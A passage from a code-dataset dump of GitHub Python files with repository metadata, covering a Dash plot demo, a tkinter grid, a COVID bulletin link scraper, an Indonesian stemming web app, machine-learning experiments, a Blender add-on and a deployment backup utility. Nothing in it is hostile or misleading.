tsDict\n","repo_name":"lhoag64/Queries","sub_path":"Queries/Queries/timesheet/tsdata.py","file_name":"tsdata.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71784279912","text":"import dash\nimport pandas as pd\nimport numpy as np\nimport plotly.graph_objs as go\nimport json\nfrom dash import dcc \nfrom dash import html\nfrom dash.dependencies import Input, Output, State\nimport base64\n\napp = dash.Dash()\n\n#this will show an image depending on what data point is being hovered over\n\ndf = pd.read_csv('./data/wheels.csv')\n\ndef encode_image(image_file):\n encoded = base64.b64encode(open(image_file,'rb').read())\n return f'data:image/png;base64,{encoded.decode()}'\n\napp.layout = html.Div([\n html.Div(dcc.Graph(id='wheels-plot',\n figure={'data':[go.Scatter(\n x=df['color'],\n y=df['wheels'],\n dy=1,\n mode='markers',\n marker={'size':15}\n )],\n 'layout':go.Layout(title='Test', hovermode='closest')\n }),style={'width':'30%', 'float':'left'}),\n html.Div([html.Img(id='hover-data',src='children',height=300)],\n style={'paddingTop':35})\n])\n#IMPORTANT hover-data IS AN ID WE SET hoverData IS A DCC.GRAPH FUNCTION\n@app.callback(Output('hover-data', 'src'),\n [Input('wheels-plot','hoverData')] \n)\ndef callback_image(hoverData):\n wheel = hoverData['points'][0]['y']\n color = hoverData['points'][0]['x']\n path = './data/images/'\n return encode_image(path+df[(df['wheels']==wheel)& \n (df['color']==color)]\n ['image'].values[0])\n\nif __name__ == '__main__':\n app.run_server()","repo_name":"JPcalkins213/plotly_notes","sub_path":"dash_notes/hoverData_comp.py","file_name":"hoverData_comp.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8914893158","text":"import tkinter as tk\nfrom tkinter import *\n\n\nclass Application(tk.Tk):\n def __init__(self, grid):\n self.grid = grid\n self.d ={}\n tk.Tk.__init__(self)\n self.width = self.winfo_screenwidth()\n self.height = self.winfo_screenheight()\n self.configure(background='black')\n self.create_grid()\n\n\n def create_grid(self):\n for i in range (self.grid.width ):\n for j in range (self.grid.height ):\n self.d[\"label{0}{1}\".format(i,j)] = Label(self, bg ='white')\n self.d[\"label{0}{1}\".format(i, j)].grid(row=i, column=j,ipadx =(self.width / self.grid.height)/4 , ipady = self.height / (self.grid.width * 4), padx = '1',pady='1')\n if self.grid.grid[i][j] == \"[X]\":\n self.d[\"label{0}{1}\".format(i, j)].configure(bg=\"red\")\n\n\n def update_grid(self,column,size,h):\n for i in range(self.grid.width):\n for j in range(self.grid.height):\n if self.grid.grid[ i ][ j ] == \"[X]\":\n self.d[ \"label{0}{1}\".format(i, j) ].configure(bg=\"red\")\n for i in range(h):\n self.d[ \"label{0}{1}\".format(self.grid.width - size + i , column) ].configure(bg='yellow')\n\n\n\n def show_grid(self):\n for i in range(self.grid.width):\n for j in range(self.grid.height):\n if self.grid.grid[ i ][ j ] == \"[X]\":\n self.d[ \"label{0}{1}\".format(i, j) ].configure(bg=\"red\")\n\n\n\n\n\n\n\n\n","repo_name":"Zelwa/ModelisationAlgoLLL","sub_path":"modelisation/Application.py","file_name":"Application.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6418686229","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: LgOliveira\r\n\"\"\"\r\nimport re\r\nimport requests\r\nfrom pathlib import Path\r\n\r\nimport locale\r\nlocale.setlocale(locale.LC_TIME, \"pt_PT.UTF-8\")\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n url = 'https://covid19.min-saude.pt/'\r\n\r\n response = requests.get(\r\n url=url,\r\n headers={\r\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Accept-Language': 'pt-PT,pt;q=0.9',\r\n 'Accept-Encoding': 'br',\r\n },\r\n )\r\n if response.status_code != 200:\r\n raise ValueError('Unable to retrieve data from covid site. Error %s: $s' % response.status_code, response.text)\r\n\r\n # Ponto de Situação (31-01-2022)\r\n matches = re.search((\r\n r'(https://covid19.min-saude.pt/wp-content/uploads/[0-9]+/[0-9]+/([0-9]+_DGS_boletim_([0-9]+)\\.pdf))'\r\n ), response.text, re.MULTILINE | re.IGNORECASE)\r\n\r\n if not matches:\r\n print(response.text)\r\n raise(\"Link not found\")\r\n link = matches.group(1)\r\n\r\n path = Path(__file__).resolve().parents[1]\r\n file=path / 'report_link.txt'\r\n with open(file,'r') as f:\r\n old_link = f.readline()\r\n\r\n if old_link != link:\r\n with open(file,'w') as f:\r\n f.write(link)\r\n print(f\"UPDATED latest={old_link} link={link}\")\r\n","repo_name":"dssg-pt/covid19pt-data","sub_path":".github/workflows/disabled/Web_Scrapper_DGS.py","file_name":"Web_Scrapper_DGS.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":447,"dataset":"github-code","pt":"72"} +{"seq_id":"41008027110","text":"import os\nimport app\nimport json\nfrom flaskext.mysql import MySQL\nfrom flask import Blueprint, render_template, request, make_response\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\nviews = Blueprint(\"views\", __name__)\nvowels = ['a', 'i', 'u', 'e', 'o']\n\ndef checkDict(word):\n conn = app.mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"\"\"SELECT * FROM tb_katadasar WHERE katadasar = %s\"\"\", (word,))\n data = cursor.fetchone()\n conn.close()\n return data\n\ndef rreplace(s, old, new, occurrence):\n li = s.rsplit(old, occurrence)\n return new.join(li)\n\ndef checkParticle1(word):\n particle1 = ['kah', 'lah', 'pun']\n for p in particle1:\n if word.endswith(p):\n word = rreplace(word, p, '', 1)\n return word\n return word\n\ndef checkParticle2(word):\n particle2 = ['ku', 'mu', 'nya']\n for p in particle2:\n if word.endswith(p):\n word = rreplace(word, p, '', 1)\n return word\n return word\n\ndef checkParticle3(word):\n particle3V1 = ['meny', 'peny']\n for p in particle3V1:\n if word.startswith(p) and word[4] in vowels:\n word = word.replace(p, 's', 1)\n return word\n\n particle3V2 = ['mem', 'pem']\n for p in particle3V2:\n if word.startswith(p) and word[4] in vowels:\n word = word.replace(p, 'p', 1)\n return word\n\n particle3 = ['meng', 'men', 'mem', 'me', 'peng', 'pen', 'pem', 'di', 'ter', 'ke']\n for p in particle3:\n if word.startswith(p):\n word = word.replace(p, '', 1)\n return word\n\n return word\n\ndef checkParticle4(word):\n particle4V1 = ['bel', 'pel']\n for p in particle4V1:\n if word.startswith(p) and word.endswith('ajar'):\n word = word.replace(p, '', 1)\n return word\n\n if word.startswith('be') and word[2] == 'k' and f'{word[3]}{word[4]}' == 'er':\n word = word.replace('be', '', 1)\n return word\n\n particle4 = ['ber', 'per', 'pe']\n for p in particle4:\n if word.startswith(p):\n word = word.replace(p, '', 1)\n return word\n\n return word\n\ndef checkParticle5(word, wordOriginal):\n if word.endswith('kan') and not wordOriginal.startswith(('ke', 'peng')):\n word = rreplace(word, 'kan', '', 1)\n return word\n\n if word.endswith('an') and not wordOriginal.startswith(('di', 'meng', 'ter')):\n word = rreplace(word, 'an', '', 1)\n return word\n\n if word.endswith('i') and not wordOriginal.startswith(('ber', 'ke', 'peng')):\n word = rreplace(word, 'i', '', 1)\n return word\n\n return word\n\n@views.route(\"/\", methods = ['GET', 'POST'])\ndef home():\n if (request.method == \"GET\"):\n return render_template(\"home.html\")\n else:\n doc = request.form['document']\n\n #1 - Cleaning\n doc1 = request.form['document']\n for ch in ['\\\\','`','*','_','{','}','[',']','(',')','>','#','+','-','.','!','$','\\'',',']:\n if ch in doc1:\n doc1 = doc1.replace(ch, \" \")\n doc1 = ''.join([i for i in doc1 if not i.isdigit()])\n\n #2 - Case Folding\n doc2 = doc1.lower()\n\n #3 - Tokenization\n doc3 = doc2.split()\n\n #4 - Filtering\n data_file = os.path.join(basedir, 'static/datas/stopwords.txt')\n stopwords = []\n with open(data_file, \"r\") as file:\n for line in file.readlines():\n stopwords.append(line.rstrip())\n doc4 = doc2.split()\n for word in doc4:\n if word in stopwords:\n doc4.remove(word)\n doc4 = ' '.join(doc4)\n\n #5 - Stemming\n doc5 = []\n for idx, word in enumerate(doc4.split()):\n doc5Part = {}\n doc5Part['data'] = ''\n doc5Part['steps'] = []\n\n wordOriginal = word\n #5.1 - Hapus partikel\n wordBefore = word\n word = checkParticle1(word)\n data = checkDict(word)\n doc5Step = {}\n doc5Step['wordBefore'] = wordBefore\n doc5Step['word'] = word\n doc5Step['isFound'] = False\n doc5Part['steps'].append(doc5Step)\n if data:\n doc5Part['steps'][len(doc5Part['steps']) - 1]['isFound'] = True\n doc5Part['data'] = data\n doc5.append(doc5Part)\n continue\n\n #5.2 - Hapus akhiran kepemilikan\n wordBefore = word\n word = checkParticle2(word)\n data = checkDict(word)\n doc5Step = {}\n doc5Step['wordBefore'] = wordBefore\n doc5Step['word'] = word\n doc5Step['isFound'] = False\n doc5Part['steps'].append(doc5Step)\n if data:\n doc5Part['steps'][len(doc5Part['steps']) - 1]['isFound'] = True\n doc5Part['data'] = data\n doc5.append(doc5Part)\n continue\n\n #5.3 - Hapus awalan ke-1\n wordBefore = word\n word = checkParticle3(word)\n data = checkDict(word)\n doc5Step = {}\n doc5Step['wordBefore'] = wordBefore\n doc5Step['word'] = word\n doc5Step['isFound'] = False\n doc5Part['steps'].append(doc5Step)\n if data:\n doc5Part['steps'][len(doc5Part['steps']) - 1]['isFound'] = True\n doc5Part['data'] = data\n doc5.append(doc5Part)\n continue\n\n #5.4 - Hapus awalan ke-2\n wordBefore = word\n word = checkParticle4(word)\n data = checkDict(word)\n doc5Step = {}\n doc5Step['wordBefore'] = wordBefore\n doc5Step['word'] = word\n doc5Step['isFound'] = False\n doc5Part['steps'].append(doc5Step)\n if data:\n doc5Part['steps'][len(doc5Part['steps']) - 1]['isFound'] = True\n doc5Part['data'] = data\n doc5.append(doc5Part)\n continue\n\n #5.5 - Hapus akhiran\n wordBefore = word\n word = checkParticle5(word, wordOriginal)\n data = checkDict(word)\n doc5Step = {}\n doc5Step['wordBefore'] = wordBefore\n doc5Step['word'] = word\n doc5Step['isFound'] = False\n doc5Part['steps'].append(doc5Step)\n if data:\n doc5Part['steps'][len(doc5Part['steps']) - 1]['isFound'] = True\n doc5Part['data'] = data\n doc5.append(doc5Part)\n continue\n\n doc5.append(doc5Part)\n\n\n return render_template(\"home.html\", doc=doc, doc1=doc1, doc2=doc2, doc3=doc3, doc4=doc4, doc5=doc5, doc5Part=json.dumps(doc5Part))","repo_name":"YanuarWanda/stemming-kamus","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43212874663","text":"from sys import stdin\n\nstd = stdin.readline\n\nN = int(std())\nnum = []\nfor i in range(N):\n a = int(std())\n num.append((a, abs(a)))\n\nnum = sorted(num, key=lambda x: -x[1])\nanswer = 0\n\nwhile num:\n ans = num[0][0]\n index = -1\n for i in range(1, len(num)):\n if ans > 0:\n if num[i][0] > 1:\n index = i\n ans *= num[i][0]\n break\n else:\n if num[i][0] <= 0:\n index = i\n ans *= num[i][0]\n break\n answer += ans\n if not index == -1:\n num.pop(index)\n num.pop(0)\n\nprint(answer)\n","repo_name":"KIMJINOH97/Algorithm","sub_path":"python/BOJ/Greedy/1744.py","file_name":"1744.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72357932713","text":"import torch\nfrom transformers import BertModel,BertTokenizer\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\nsentences=[\"i guess we don't need\",\"excuse me\"]\ninputs = tokenizer(sentences, padding=True, return_tensors='pt')\n#print(inputs)\nmodel = BertModel.from_pretrained('bert-base-uncased')\noutputs = model(**inputs)\nfeatures = outputs[0][:, 0, :].detach().numpy()\nprint(outputs[0].shape)\nprint(outputs[0][:, 0, :].shape)\nprint(\"features\",features.shape)\n\ninput_ids = tokenizer([\"i guess we don't need\"], return_tensors='pt') # Batch size 1\ninput_ids2 = torch.tensor(tokenizer.encode(\"i guess we don't need\", add_special_tokens=True))\ninput_ids3=tokenizer.encode(\"i guess we don't need\", add_special_tokens=True)\nprint(input_ids,input_ids[\"token_type_ids\"],input_ids2,input_ids3)\n\nmodel = BertModel.from_pretrained('bert-base-uncased')\n\noutputs = model(**input_ids)\n#encoded_layers, _ = model(input_ids2)\n#print(\"try\",encoded_layers)\n\nprint(model)\nlast_hidden_states = outputs.last_hidden_state\nprint('last_hidden_states:' ,last_hidden_states.shape)\npooler_output = outputs.pooler_output\nprint('---pooler_output: ', pooler_output.shape)\n'''\nfrom my_model2 import tsc\n\n\nmodel=tsc()\ninput=torch.rand([300,156])\nout=model.semantic_cnn1(input)\nout=model.semantic_cnn2(out)\nout=model.semantic_cnn3(out)\nprint(out.shape)\n\naudio_input=torch.randn(500,16,40)\nh_0 = torch.randn(1,16,768)\nc_0 = torch.randn(1, 16,768)\naudio_out=model.acoustic_lstm(audio_input)\nprint(audio_out[0].shape)\n\n'''\nfrom torch.utils.tensorboard import SummaryWriter\n\nwriter = SummaryWriter('logs')\nx = range(100)\nfor i in x:\n writer.add_scalar('y=x+10', i, i+10)\nwriter.close()\n","repo_name":"xiaoheng-zhang99/fine_grained","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40097914027","text":"import argparse\nimport torch\nimport datetime\nimport json\nimport yaml\nimport os\nfrom pypots.imputation import SAITS\nimport pickle\nimport numpy as np\nimport time\nnp.set_printoptions(threshold=np.inf)\nfrom models.mask_main_model import Mask_PM25\nfrom datasets.dataset_pm25_mask import get_dataloader\nfrom utils.utils import train, clip_pattern_mask\n\ndef quantile_loss(target, forecast, q: float) -> float:\n return 2 * torch.sum(\n torch.abs((forecast - target) * ((target <= forecast) * 1.0 - q))\n )\n\n\ndef calc_denominator(target):\n return torch.sum(torch.abs(target))\n\n\ndef calc_quantile_CRPS(target, forecast, mean_scaler, scaler):\n # print(f\"target: {target.shape}\\nforecast: {forecast.shape}\")\n target = target * scaler + mean_scaler\n forecast = forecast * scaler + mean_scaler\n\n # print(f\"target: {target}\")\n # print(f\"forecasts: {forecast[0:10]}\")\n\n quantiles = np.arange(0.05, 1.0, 0.05)\n denom = calc_denominator(target)\n CRPS = 0\n for i in range(len(quantiles)):\n q_pred = []\n for j in range(len(forecast)):\n q_pred.append(torch.quantile(forecast[j : j + 1], quantiles[i], dim=1))\n q_pred = torch.cat(q_pred, 0)\n q_loss = quantile_loss(target, q_pred, quantiles[i])\n # print(f\"q_loss: {q_loss}, denom: {denom}\")\n CRPS += q_loss / denom\n # print(f\"CRPS each qunatile: {CRPS}\")\n return CRPS.item() / len(quantiles)\n\nd_time = 36\nargs = {\n 'train': {\n 'epochs': 300,\n 'batch_size': 16,\n 'lr': 1.0e-3\n }, \n 'diffusion': {\n 'layers': 4, \n 'channels': 64,\n 'nheads': 8,\n 'diffusion_embedding_dim': 128,\n 'beta_start': 0.0001,\n 'beta_end': 0.5,\n 'num_steps': 50,\n 'schedule': \"quad\",\n 'is_fast': False,\n },\n 'model': {\n 'is_unconditional': True,\n 'timeemb': 128,\n 'featureemb': 16,\n 'target_strategy': \"mix\",\n 'type': 'CSDI',\n 'n_layers': 3, \n 'd_time': d_time,\n 'n_feature': 36,#len(attributes),\n 'd_model': 128,\n 'd_inner': 128,\n 'n_head': 8,\n 'd_k': 64,\n 'd_v': 64,\n 'dropout': 0.1,\n 'diagonal_attention_mask': True,\n \"test_missing_ratio\": 0.1\n }\n}\n\nprint(f\"config: {args}\")\nargs['validationindex'] = 0\nargs['device'] = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ntrain_loader, valid_loader, test_loader, std, mean = get_dataloader(\n args[\"train\"][\"batch_size\"], device=args['device'], validindex=args['validationindex']\n)\nargs['model']['type'] = 'CSDI'\nargs['diffusion']['is_fast'] = False\nargs['device'] = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nmodel_csdi = Mask_PM25(args, args['device']).to(args['device'])\nmodel_folder = \"saved_model_pm25_mask\"\nfilename = \"model_csdi_pm25_mask.pth\"\nif not os.path.isdir(model_folder):\n os.makedirs(model_folder)\ntrain(\n model_csdi,\n args[\"train\"],\n train_loader,\n valid_loader=valid_loader,\n foldername=model_folder,\n filename=filename\n)\n\n# model_csdi.load_state_dict(torch.load(f\"{model_folder}/{filename}\"))\n\nnsample = 30000 # 3000 * 4 * 8\nground = 0\nfor i, val in enumerate(test_loader):\n ground = val['observed_mask'].to(args[\"device\"]).float() # (B, L, K)\n\nsample_folder = './data/pm25/miss_patterns'\n\nif not os.path.isdir(sample_folder):\n os.makedirs(sample_folder)\n# L = 48, K = 35\nwith torch.no_grad():\n output = model_csdi.evaluate(nsample, shape=(1, 36, 36))\n samples = output\n samples = samples.permute(0, 1, 3, 2) # (B,nsample,L,K)\n\n # print(f\"sample 1: {samples[0][0].cpu().numpy()}\")\n # print(f\"sample 1: {samples[0][2].cpu().numpy()}\")\n # print(f\"sample 1: {samples[0][3].cpu().numpy()}\")\n save_samples = clip_pattern_mask(samples.cpu().numpy())\n save_samples = save_samples.squeeze(0)\n # print(f\"sample 1: {save_samples[0].cpu().numpy()}\")\n # print(f\"sample 1: {save_samples[2].cpu().numpy()}\")\n # print(f\"sample 1: {save_samples[3].cpu().numpy()}\")\n for i in range(save_samples.shape[0]):\n np.save(f\"{sample_folder}/pattern_{i}.npy\", save_samples[i])\n\n crps_avg = 0\n num = 0\n for i in range(len(ground)):\n crps = calc_quantile_CRPS(ground[i].unsqueeze(0), samples, 0, 1)\n print(f\"CRPS for {i} : {crps}\")\n crps_avg += crps\n num += 1\n print(f\"final CRPS: {crps_avg / num}\")","repo_name":"rafid009/Time-series-imputation","sub_path":"exe_pm25_mask.py","file_name":"exe_pm25_mask.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32784479218","text":"puzzle_input = open(\"Day 6/puzzleinput.txt\").read().splitlines()\n\ngroups = []\ntemp_group = []\n\nfor response in puzzle_input:\n if response != '':\n temp_group.append(response)\n else: \n groups.append(temp_group)\n temp_group = []\n\nprint(groups[0])\n\ncount = 0\n\nfor group in groups:\n group_yes = []\n for line in group:\n person_yes = [char for char in \"abcdefghijklmnopqrstuvwxyz\" if char in line]\n group_yes += [char for char in person_yes if char not in group_yes]\n count += len(group_yes)\n\nprint(group)\nprint(person_yes)\nprint(group_yes)\nprint(count)\n","repo_name":"Dwittyy/AdventOfCode","sub_path":"2020/Day 6/Day 6a.py","file_name":"Day 6a.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26936074810","text":"import bpy\nimport bmesh\n\n\nclass OBJECT_OT_FindNoSGfaces(bpy.types.Operator):\n bl_idname = \"object.find_no_sg_faces\"\n bl_label = \"Check Smoothing groups\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n def execute(self, context):\n original_mode = bpy.context.object.mode\n bpy.ops.object.mode_set(mode=\"OBJECT\")\n\n obj = context.active_object\n mesh = obj.data\n\n if not obj or obj.type != \"MESH\":\n self.report({\"WARNING\"}, \"Active object is not a mesh\")\n return {\"CANCELLED\"}\n\n if \"SG\" in mesh.attributes:\n attr = mesh.attributes[\"SG\"].data\n no_sg_faces = [index for index, face in enumerate(attr) if face.value == 0]\n\n obj[\"no_sg_faces\"] = no_sg_faces\n\n if original_mode == \"EDIT\":\n bpy.ops.object.mode_set(mode=\"EDIT\")\n bpy.ops.object.select_no_sg_faces()\n\n return {\"FINISHED\"}\n\n\nclass OBJECT_OT_SelectNoSGfaces(bpy.types.Operator):\n bl_idname = \"object.select_no_sg_faces\"\n bl_label = \"Select Faces with No Smooth Group\"\n\n def execute(self, context):\n obj = context.active_object\n\n if not obj or obj.type != \"MESH\" or \"no_sg_faces\" not in obj:\n self.report(\n {\"WARNING\"}, \"No faces to select or active object is not a mesh\"\n )\n return {\"CANCELLED\"}\n\n bpy.ops.object.mode_set(mode=\"EDIT\")\n\n mesh = bmesh.from_edit_mesh(obj.data)\n mesh.faces.ensure_lookup_table()\n\n for index in obj[\"no_sg_faces\"]:\n if index < len(mesh.faces):\n mesh.faces[index].select_set(True)\n\n bmesh.update_edit_mesh(obj.data)\n return {\"FINISHED\"}\n\n\nclass OBJECT_OT_FindLooseVertsEdges(bpy.types.Operator):\n bl_idname = \"object.find_loose_verts_edges\"\n bl_label = \"Find Loose Vertices and Edges\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n def execute(self, context):\n obj = context.active_object\n\n if not obj or obj.type != \"MESH\":\n self.report({\"WARNING\"}, \"Active object is not a mesh\")\n return {\"CANCELLED\"}\n\n bpy.ops.object.mode_set(mode=\"OBJECT\")\n\n mesh = bmesh.new()\n mesh.from_mesh(obj.data)\n\n # Finding loose vertices and edges\n loose_verts = [v.index for v in mesh.verts if not v.link_edges]\n loose_edges = [e.index for e in mesh.edges if not e.link_faces]\n\n # Storing the results in the object\n obj[\"loose_verts\"] = loose_verts\n obj[\"loose_edges\"] = loose_edges\n\n mesh.free()\n return {\"FINISHED\"}\n\n\nclass OBJECT_OT_SelectLooseVertsEdges(bpy.types.Operator):\n bl_idname = \"object.select_loose_verts_edges\"\n bl_label = \"Select Loose Vertices and Edges\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n def execute(self, context):\n obj = context.active_object\n\n if not obj or obj.type != \"MESH\" or \"loose_verts\" not in obj or \"loose_edges\" not in obj:\n self.report({\"WARNING\"}, \"No elements to select or active object is not a mesh\")\n return {\"CANCELLED\"}\n\n bpy.ops.object.mode_set(mode=\"EDIT\")\n\n bm = bmesh.from_edit_mesh(obj.data)\n bm.verts.ensure_lookup_table()\n bm.edges.ensure_lookup_table()\n\n # Select loose vertices\n for v_index in obj[\"loose_verts\"]:\n if v_index < len(bm.verts):\n bm.verts[v_index].select_set(True)\n\n # Select loose edges\n for e_index in obj[\"loose_edges\"]:\n if e_index < len(bm.edges):\n bm.edges[e_index].select_set(True)\n\n bmesh.update_edit_mesh(obj.data)\n return {\"FINISHED\"}\n\n\n\nclasses = (\n OBJECT_OT_FindNoSGfaces,\n OBJECT_OT_SelectNoSGfaces,\n OBJECT_OT_SelectLooseVertsEdges,\n OBJECT_OT_FindLooseVertsEdges,\n)\n\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n\n\ndef unregister():\n for cls in classes:\n bpy.utils.unregister_class(cls)\n\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"deve0ne/TimofeyToolbox","sub_path":"mesh_check.py","file_name":"mesh_check.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5147776897","text":"import zipfile\nimport shutil\nimport os\nimport uuid\nimport re\nimport pwd\nimport grp\nimport json\nimport os.path as path\nfrom logger import logger\nimport subprocess\n\ndef zip_files(zip_file_name, saved_dir, files_to_zip):\n logger.info(\"zip files as [{}] to [{}]\".format(zip_file_name, saved_dir))\n with zipfile.ZipFile(os.path.join(saved_dir, zip_file_name), 'x') as zipMe:\n for file in files_to_zip:\n logger.info(\"adding file [{}]\".format(file))\n zipMe.write(file, path.basename(file),\n compress_type=zipfile.ZIP_DEFLATED)\n logger.info(\"zip files finished.\")\n\ndef unzip_file(tmp_dir_to_unzip, zip_file):\n logger.info(\"Unzipping file [{}] to [{}]\".format(zip_file, tmp_dir_to_unzip)) \n with zipfile.ZipFile(zip_file, 'r') as zipFile:\n zipFile.extractall(tmp_dir_to_unzip)\n logger.info(\"unzip finished.\")\n\n\ndef backup_file(change, settings):\n logger.info(\"getting files to backup\") \n files_to_backup = [sanitize_path(x['dst'])\n for x in change['files_to_update'] if os.path.isfile(sanitize_path(x['dst']))] \n conf_dir = os.path.join(\"/tmp\", str(uuid.uuid4())) \n os.mkdir(conf_dir)\n logger.info(\"made tmp folder to copy files: [{}]\".format(conf_dir))\n file_list = []\n for file in change['files_to_update']:\n obj = {}\n path = sanitize_path(file['dst'])\n if os.path.isfile(path):\n st = os.stat(path)\n obj['permission'] = oct(st.st_mode)[-3:]\n obj['user'] = pwd.getpwuid(st.st_uid)[0]\n obj['group'] = grp.getgrgid(st.st_gid)[0]\n obj['src'] = os.path.basename(path)\n file_list.append(obj)\n shutil.copy(path, conf_dir)\n conf_file = os.path.join(conf_dir, \"package-info.json\")\n with open(conf_file, 'w+') as f:\n json.dump(file_list, f, indent=4,\n separators=(',', ': '), sort_keys=True)\n logger.info(\"Write package-info.json file as:\")\n logger.info(json.dumps(file_list, indent=4,\n separators=(',', ': '), sort_keys=True))\n files_to_backup.append(conf_file)\n zip_files(change['change_id']+'.zip',\n sanitize_path(settings['backup_dir']), files_to_backup)\n for file in change['files_to_update']:\n if os.path.isfile(path):\n os.remove(sanitize_path(file['dst']))\n return conf_dir\n\n\ndef sanitize_path(path):\n result = re.findall(r'(\\$\\{?(\\w+)\\}?)', path)\n for group in result:\n if group[1] in os.environ:\n path = path.replace(group[0], os.environ[group[1]])\n return path\n\n\ndef do_single_file_move(base_dir, file, origin_tmp_dir):\n dest_file = sanitize_path(file['dst'])\n if file['src'] == '':\n # it is done in backup files.\n logger.info(\"removing [{}]\".format(file['dst']))\n os.remove(dest_file)\n else:\n if 'is_config' in file and file['is_config'] == True:\n logger.info(\"performing config file change...\")\n delimeter = file['delimeter']\n config = {}\n with open(path.join(base_dir, file['src']), 'r') as f:\n content = f.readlines()\n config = {line.split(delimeter)[0].strip(): {\"value\":delimeter.join(\n line.split(delimeter)[1:]), \"installed\":False} for line in content}\n file_name = os.path.basename(dest_file)\n with open(path.join(origin_tmp_dir, file_name), 'r') as f:\n content = f.readlines()\n with open(dest_file, 'w+') as f:\n logger.info(\"opening file to write: [{}]\".format(dest_file))\n for line in content:\n key, value = line.split(delimeter)[0], delimeter.join(\n line.split(delimeter)[1:])\n print(\"key:value-> [{}]:[{}]\".format(key,value))\n if key.strip() in config:\n f.write(\"{}{}{}\\n\".format(key, delimeter, config[key]['value']))\n config[key]['installed']=True\n else:\n f.write(\"{}\".format(line))\n for key, value in config.items():\n if value['installed'] == False:\n logger.info(\"appending: {}{}{}\\n\".format(key, delimeter, value['value']))\n f.write(\"{}{}{}\\n\".format(key, delimeter, value['value']))\n logger.info(\"config file change done.\")\n else:\n shutil.copy(os.path.join(base_dir, file['src']), dest_file)\n os.chmod(dest_file, int(file['permission'], 8))\n uid = pwd.getpwnam(file['user']).pw_uid\n gid = grp.getgrnam(file['group']).gr_gid\n os.chown(dest_file, uid, gid)\n\n\ndef download_file(dir_to_down, settings, change):\n logger.info(\"downloading file [{}]...\".format(change['package_name']))\n if os.path.isdir(dir_to_down):\n shutil.rmtree(dir_to_down)\n os.mkdir(dir_to_down)\n\n shutil.copy(path.join(sanitize_path(\n settings['zip_dir']), change['package_name']), dir_to_down)\n logger.info(\"file downloaded to [{}]\".format(dir_to_down))\n\ndef do_test(change, settings):\n setting = [s['test_script'] for s in settings['test'] if s['application']]\n try:\n test_file = sanitize_path(setting[0])\n logger.info(\"runing test file: [{}]\".format(test_file))\n sp = subprocess.run([\n \"python\", test_file], check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) \n sp.check_returncode()\n logger.info(sp.stdout)\n logger.info(sp.stderr)\n except subprocess.CalledProcessError as e:\n logger.error(e)\n return False\n return True\n\ndef get_change_id(change, settings):\n logger.info(\"getting change id...\")\n change_id = '{}-{}'.format(change['action'], change['update_id'])\n file_list = os.listdir(sanitize_path(settings['backup_dir']))\n same_name = [ f for f in file_list if change_id in f]\n if len(same_name)>0:\n change_id = change_id + \"-\" + str(len(same_name))\n logger.info(\"change id is [{}]\".format(change_id))\n return change_id\n","repo_name":"X20435668/cs5331_project","sub_path":"bin/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28910039845","text":"\"\"\"\nTest the results of stratifying a model.\n\"\"\"\nimport pytest\nimport pandas as pd\nfrom pandas.util.testing import assert_frame_equal\n\nfrom summer_py.summer_model import StratifiedModel\nfrom summer_py.constants import Compartment, Flow, BirthApproach, Stratification, IntegrationType\n\n\nPARAM_VARS = \"flows, custom_func, params, adjustment, comps, expected_flows, expected_custom_func, expected_params\"\nPARAM_VALS = [\n # Start with two transition flows and two parameters,\n # Apply 2x strata and 1x parameter adjustment\n # Apply strata to all compartments\n # Expect 4 new transition flows and 2 new parameters.\n [\n # Starting flow\n [\n [\"standard_flows\", \"flow_0\", \"susceptible\", \"infectious\", 0, None, None],\n [\"standard_flows\", \"flow_1\", \"infectious\", \"susceptible\", 0, None, None],\n ],\n # Starting custom flow funcs\n {},\n # Starting params\n {\"flow_0\": 0.5, \"flow_1\": 0.1,},\n # Adjustments\n {\"flow_0\": {\"foo\": 0.2, \"bar\": 0.7,}},\n # Compartments to stratify\n [\"susceptible\", \"infectious\"],\n # Expected flows\n [\n [\"standard_flows\", \"flow_0\", \"susceptible\", \"infectious\", 0, None, None],\n 